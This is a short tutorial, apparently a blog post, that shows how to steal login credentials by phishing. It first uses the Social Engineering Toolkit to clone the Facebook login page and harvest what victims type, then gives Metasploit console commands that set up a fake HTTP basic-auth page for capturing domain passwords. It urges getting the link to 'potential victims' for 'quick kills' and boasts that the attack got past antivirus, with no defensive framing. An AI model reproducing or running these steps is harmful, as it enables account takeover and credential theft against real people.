SET on BT5r3 - Stealing Facebook Credentials

In this tutorial, we will show you how to steal Facebook credentials using the Social Engineering Toolkit on BackTrack Linux.

Fire up the Social Engineering Toolkit from BackTrack.  Select 1 for the SET Attack.

 For this tutorial, we will use the Website Attack Vectors as our mechanism

Since we are going to steal the credential, we proceed to select 3

We will choose 2 to clone the site we are going to dupe.
Enter the IP address of where the clone site be hosted.
Enter the link of the website. In this case, we will clone the facebook login page.

 Once the site is cloned, provide the link/IP for the victim to enter. The victim will get the Facebook login page website.

And when the victim type in the username and password, the credentials will be sent to the attacker's console.

METASPLOIT - Stealing Credentials (The Lazy Way)

Just when you think its all harmless and innocent.....

In this example, we are going to show how easy it is to steal credentials through deception. Fire up our metasploit,

#msfconsole

#msf > use auxiliary/server/capture/http_basic

#msf auxiliary(http_basic) > set URIPATH ClickMe

#msf auxiliary(http_basic) > exploit

A link will be generated and in this case its http://192.168.71.169:80/ClickMe. For quick kills, you need to find a way to provide this link to potential victims.

Once the victim receives the link and enters it in the URL;

A username and password is asked. Typically, unknown victims will input their domain credentials. For this example, i used the username= 'windowsusername' and the password='domainpassword'.

When the victim clicks Log In, the credentials are being sent to the attacker!

*Test was done with Mcafee AV status updated and Windows Firewall On. :)